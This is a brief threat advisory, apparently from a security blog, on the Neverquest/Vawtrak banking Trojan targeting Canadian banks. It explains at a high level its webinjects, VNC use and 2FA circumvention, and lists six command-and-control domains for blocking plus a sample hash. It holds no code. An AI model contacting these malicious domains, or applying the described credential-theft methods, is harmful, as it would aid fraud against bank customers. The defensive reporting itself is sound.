Neverquest (aka Vawtrak) is a classic Trojan-banker with a variety of different advanced functions to attack online banking customers. The malware often gets installed through downloaders that are dropped using drive-by attacks.
When the Neverquest’s main component is installed, it will modify settings on the system and enable different functions, such as video and screenshot capturing. In the meantime, it will establish a reverse connection to a list of predefined C&Cs and enroll the machine into the BOTnet with a unique BOTID. This allows the attacker to steal all passwords stored on the system as well as update the component and functions at any time.
The current webinject reveals that the primary goal, at least of this campaign, is financial institutions in Canada. We have more than 15 unique targets in Canada. The webinject is very much in the style of the ZeuS template and with the goal to alter the content of several specified target websites.
Even the most savvy browsers are unlikely to be aware of such changes as they occur under the hood at the official site.
Webinjection allows the attackers to circumvent 2FA (Two Factor Authentification) and harvest additional user data. This, in combination with virtual network computing (VNC), will break most online banking protection.
The C&C servers, which should be blocked or preferably nuked, are shown below:
horologecom.net
derjihuy.com
woevenglaref.ru
fywaskinsed.ru
zdravstvuyfm.com
nawerhuy.com
The domains translate to different IPs, which gives us the following geoIP heatmap.
We have a lot of overlapping hostile activities coming from these servers/IPs. Best recommendation would be blocking all of them.
Sample hash: 8f6c511eb4210b5c8c5ee957e0e99a33